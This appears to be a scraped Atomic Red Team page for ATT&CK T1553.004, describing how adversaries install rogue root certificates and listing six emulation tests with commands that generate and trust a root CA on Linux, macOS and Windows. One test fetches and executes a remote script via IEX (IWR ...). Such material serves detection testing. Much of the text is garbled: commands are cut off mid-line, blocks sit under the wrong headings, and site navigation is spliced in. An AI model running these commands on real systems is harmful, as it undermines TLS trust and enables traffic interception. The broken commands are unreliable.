

T1553.004 - Install Root Certificate

Description from ATT&CK

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide Adversary-in-the-Middle capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)

Atomic Tests

- Atomic Test #1 Install root CA on CentOS/RHEL
- Atomic Test #2 Install root CA on Debian/Ubuntu
- Atomic Test #3 Install root CA on macOS
- Atomic Test #4 Install root CA on Windows

- Atomic Test #5 Install root CA on Windows with certutil
- Atomic Test #6 Add Root Certificate to CurrentUser Certificate Store

Atomic Test #1 - Install root CA on CentOS/RHEL

Creates a root CA with openssl

Supported Platforms: Linux

auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e

Inputs:

Name	Description	Туре	Default Value
cert_filename	Path of the CA certificate we create	Path	rootCA.crt
key_filename	Key we create that is used to create the CA certificate	Path	rootCA.key

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

```
openssl genrsa -out #{key_filename} 4096

openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -su

cp #{cert_filename} /etc/pki/ca-trust/source/anchors/

update-ca-trust
```

Cleanup Commands:

rm /etc/pki/ca-trust/source/anchors/#{cert_filename}
update-ca-trust

Q

Atomic Test #2 - Install root CA on Debian/Ubuntu

Creates a root CA with openssl

Supported Platforms: Linux

auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff

Inputs:

Name	Description	Туре	Default Value
cert_filename	CA file name	Path	rootCA.crt
key_filename	Key we create that is used to create the CA certificate	Path	rootCA.key

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

mv #{cert_filename} /usr/local/share/ca-certificates
echo sudo update-ca-certificates

Q

Dependencies: Run with sh!

Description: Verify the certificate exists. It generates if not on disk.

Check Prereq Commands:

```
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
```

Get Prereq Commands:

Atomic Test #3 - Install root CA on macOS

Creates a root CA with openssl

Supported Platforms: macOS

auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49

Inputs:

Name	Description	Туре	Default Value
cert_filename	CA file name	Path	rootCA.crt
key_filename	Key we create that is used to create the CA certificate	Path	rootCA.key

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

```
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/Sy
```

Dependencies: Run with sh!

Description: Verify the certificate exists. It generates if not on disk.

Check Prereq Commands:

```
if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
```

Get Prereq Commands:

Atomic Test #4 - Install root CA on Windows

Creates a root CA with Powershell

Supported Platforms: Windows

auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1

Inputs:

Name	Description	Туре	Default Value
pfx_path	Path of the certificate	Path	rootCA.cer

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Cleanup Commands:

```
try {
    $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation C
    Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction
    Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorActio
}
catch { }
```

Dependencies: Run with powershell!

Description: Verify the certificate exists. It generates if not on disk.

Check Prereq Commands:

```
if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
```

Get Prereq Commands:

```
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreL
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumb
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
```

Atomic Test #5 - Install root CA on Windows with certutil

Creates a root CA with certutil

Supported Platforms: Windows

auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f

Inputs:

Name	Description	Туре	Default Value
pfx_path	Path of the certificate	Path	\$env:Temp\rootCA2.cer

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```
certutil -addstore my #{pfx_path}
```

Cleanup Commands:



Dependencies

Q

Dependencies: Run with powershell!

Files

۲° f339e7d

github. atomic_red_team atomics Indexes T1003.001 T1003.002 T1003.003 T1003.004 T1003.005 T1003.006 T1003.007 T1003.008 T1003 T1006 T1007 T1010 T1012 T1014 T1016 T1018 T1020 T1021.001 T1021.002 T1021.003 T1021.006 T1027.001 T1027.002 T1027.004 T1027 T1030 T1033 T1036.003 T1036.004 > T1036.005 > T1036.006 > T1036 > T1037.001 > T1037.002 > T1037.004

> T1037.005

> T1039

> T1040

```
Description: Certificate must exist at specified location (#{pfx_path})
```

Check Prereq Commands:

```
if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
```

Get Prereq Commands:

```
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreL
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumb
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
```

Atomic Test #6 - Add Root Certificate to CurrentUser Certificate Store

The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

Supported Platforms: Windows

auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```
IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atom \Box
```

Cleanup Commands:

```
Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq ' [ ]
```